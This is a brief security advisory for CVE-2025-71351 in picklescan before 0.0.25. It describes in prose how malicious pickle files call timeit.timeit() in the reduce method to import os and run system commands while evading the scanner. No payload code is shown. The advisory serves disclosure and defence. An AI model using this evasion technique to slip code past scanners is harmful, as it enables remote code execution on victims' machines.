PT-2026-51215 · Picklescan · Picklescan
Seaw1Nd
·
Published
2026-06-21
·
Updated
2026-06-21
·
CVE-2025-71351
CVSS v4.0
7.6
High
| Vector | AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit() in the reduce method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute when pickle.load() is called.
Fix
Incomplete List of Disallowed Inputs
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Picklescan